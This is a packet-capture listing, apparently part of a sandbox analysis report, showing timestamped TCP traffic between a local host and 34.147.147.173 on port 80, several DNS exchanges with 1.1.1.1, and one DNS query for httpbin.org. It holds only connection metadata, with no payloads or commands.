                                    Dec 31, 2024 15:41:59.755266905 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755279064 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755284071 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755295992 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.755301952 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755323887 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.755350113 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.759974957 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.760035038 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.760042906 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.760099888 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.760162115 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.760195971 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.760216951 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.760238886 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.760267019 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.760277033 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.760319948 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.760339022 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.803369045 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.803518057 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.855361938 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.855417013 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.903542995 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.903620005 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.951400042 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.951467991 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:41:59.999440908 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:41:59.999505997 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.047421932 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.047487974 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.095511913 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.095577002 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.143352032 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.143408060 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.171138048 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.171318054 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176188946 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176199913 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176234961 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176244974 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176259041 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176270962 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176280975 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176311970 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176316977 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176321030 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176358938 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176373005 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176397085 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176402092 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176412106 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176423073 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176453114 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176456928 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176495075 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176497936 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176526070 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176564932 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176564932 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176593065 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176618099 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.176639080 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176708937 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176733971 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176808119 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176836014 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176846027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176913977 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176951885 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.176986933 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.177058935 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.177099943 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.177156925 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.177172899 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.177277088 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.177369118 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.181086063 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181153059 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.181173086 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181184053 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181236029 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.181257010 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181277037 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181324005 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.181329012 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181346893 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181413889 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181449890 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181549072 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181647062 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181669950 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181679964 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181710958 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181792021 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181802988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181812048 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181835890 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181844950 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181883097 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181891918 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181931973 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.181941032 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182151079 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182158947 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182209969 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182213068 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182260036 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182296991 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182337046 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182344913 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182379007 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182385921 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182432890 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182435036 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182445049 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182454109 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182507038 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182507038 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182517052 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182527065 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.182542086 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182552099 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182593107 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182609081 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182624102 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182631969 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182666063 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182676077 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182708979 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182718039 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182742119 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182750940 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182771921 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182780027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182812929 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182825089 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182842970 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182851076 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182883024 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182893038 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182920933 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182929993 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182961941 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182970047 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.182996988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183006048 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183036089 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183047056 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183085918 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183103085 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183120012 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183135033 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183150053 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183166027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.183176041 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.185940027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.185995102 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186050892 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186060905 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186116934 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186130047 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186161995 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186171055 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186963081 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186981916 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.186999083 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187015057 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187030077 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187050104 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187072039 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187082052 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187139988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187149048 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187191010 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187200069 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187206984 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187225103 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187388897 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187397003 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187398911 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.187426090 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187458992 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.187480927 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187551975 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187643051 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187686920 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187695980 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187834024 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187843084 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187850952 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187906027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187988997 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.187999010 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188045979 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188057899 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188077927 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188086987 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188144922 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188153982 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188209057 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188218117 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188260078 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188268900 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188316107 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188338041 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188368082 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188376904 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188404083 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188415051 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188424110 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188441038 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188456059 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188472033 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188493967 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188502073 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188512087 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188519955 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.188544035 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192267895 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192286968 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192351103 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192375898 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192404985 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192413092 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192435980 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192444086 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192459106 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192470074 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192495108 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192502975 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192537069 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192545891 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192595005 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:00.192631960 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192645073 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192662954 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192672014 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192687035 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192720890 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192735910 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192744017 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192751884 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192770004 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192784071 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192791939 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192825079 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192833900 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192854881 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192862988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192898989 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192914963 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192935944 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192945957 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192960024 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.192967892 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193017960 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193026066 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193047047 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193056107 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193067074 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193121910 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193130016 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193144083 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193165064 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193173885 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193181992 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193200111 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193216085 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193224907 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193260908 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193269968 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.193284988 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197526932 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197566986 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197598934 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197695971 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197844028 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197853088 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197863102 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197870970 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.197938919 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198075056 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198085070 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198093891 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198101997 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198131084 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198148966 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198164940 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198174000 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198191881 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198199987 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198250055 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198282003 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198297977 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198306084 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198323965 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198334932 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198378086 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198395014 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198410034 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198417902 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198432922 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198441029 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198451042 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198477983 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198508978 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198519945 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198538065 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198546886 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198554993 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198564053 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198579073 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198587894 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:00.198596001 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:02.480638027 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:02.481158018 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:02.486238003 CET804970634.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:02.486311913 CET4970680192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.141534090 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.146378040 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.146470070 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.147456884 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.152193069 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.782170057 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.782730103 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:03.787748098 CET804970734.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:03.787803888 CET4970780192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.579063892 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.583889008 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:04.583957911 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.584219933 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:04.588992119 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:05.292166948 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:05.292814970 CET4970880192.168.2.934.147.147.173
                                    Dec 31, 2024 15:42:05.297902107 CET804970834.147.147.173192.168.2.9
                                    Dec 31, 2024 15:42:05.297959089 CET4970880192.168.2.934.147.147.173

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 31, 2024 15:41:57.403222084 CET5559653192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:57.403340101 CET5559653192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:57.410196066 CET53555961.1.1.1192.168.2.9
                                    Dec 31, 2024 15:41:57.410262108 CET53555961.1.1.1192.168.2.9
                                    Dec 31, 2024 15:41:59.217747927 CET5559953192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:59.217869997 CET5559953192.168.2.91.1.1.1
                                    Dec 31, 2024 15:41:59.729695082 CET53555991.1.1.1192.168.2.9
                                    Dec 31, 2024 15:41:59.729741096 CET53555991.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:02.672317028 CET5560153192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:02.674532890 CET5560153192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:03.140379906 CET53556011.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:03.140400887 CET53556011.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:03.838474035 CET5560353192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:03.838521004 CET5560353192.168.2.91.1.1.1
                                    Dec 31, 2024 15:42:04.456136942 CET53556031.1.1.1192.168.2.9
                                    Dec 31, 2024 15:42:04.578126907 CET53556031.1.1.1192.168.2.9

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 31, 2024 15:41:57.403222084 CET192.168.2.91.1.1.10xa13aStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
